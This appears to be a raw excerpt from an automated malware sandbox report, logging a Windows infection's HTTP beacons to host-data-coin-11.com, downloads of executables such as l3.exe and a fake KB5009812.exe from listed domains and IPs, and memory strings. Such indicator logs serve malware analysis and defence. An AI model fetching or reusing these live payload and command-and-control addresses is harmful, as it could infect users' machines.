                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpoovg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://inyhvk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oabgm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iaimu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwapt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmtsfedit.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cvdnubldkb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crxfds.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yuhcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owybkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddkkslyotn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsbkvqwnoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmqdweotts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbcrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yldgixbqm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wlqxaynuuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qochog.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drvwc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsgnkffj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylqihxvnug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvrhmio.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oeaexcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcifwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rffngorjcd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfwxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://takmxbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ftcxosy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhlwowqbr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykguadbgli.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ircqiowi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnvpcgnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: host-data-coin-11.com
                      Source: global trafficTCP traffic: 192.168.2.3:49789 -> 185.7.214.171:8080
Source: WerFault.exe, 00000015.00000002.434956390.0000000004A44000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.425224721.0000000004A44000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.433530972.000001C13D300000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000006.00000002.307249135.0000019EF1E13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.comr
Source: B217.exe, 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, B217.exe, 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, B217.exe, 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000006.00000003.306630585.0000019EF1E5E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000006.00000003.306594986.0000019EF1E67000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307389782.0000019EF1E6A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000006.00000003.306604066.0000019EF1E49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307358112.0000019EF1E4E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000006.00000003.306731630.0000019EF1E41000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307338832.0000019EF1E42000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000006.00000003.306731630.0000019EF1E41000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307338832.0000019EF1E42000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000006.00000003.306630585.0000019EF1E5E000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000006.00000002.307383226.0000019EF1E65000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000006.00000002.307249135.0000019EF1E13000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000006.00000003.306713287.0000019EF1E45000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000006.00000003.306713287.0000019EF1E45000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307316944.0000019EF1E3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000006.00000003.306604066.0000019EF1E49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307358112.0000019EF1E4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000018.00000003.404140344.000001C13D37E000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404329534.000001C13D3A0000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404235759.000001C13D819000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404260188.000001C13D802000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404168368.000001C13D38F000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /l3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 74.201.28.62
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /l2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: GET /book/KB5009812.png HTTP/1.1 | Host: 74.201.28.62 | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown | Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown | Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown | Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown | Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49933
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:00 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 10 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 19{i+,GO0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:00 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 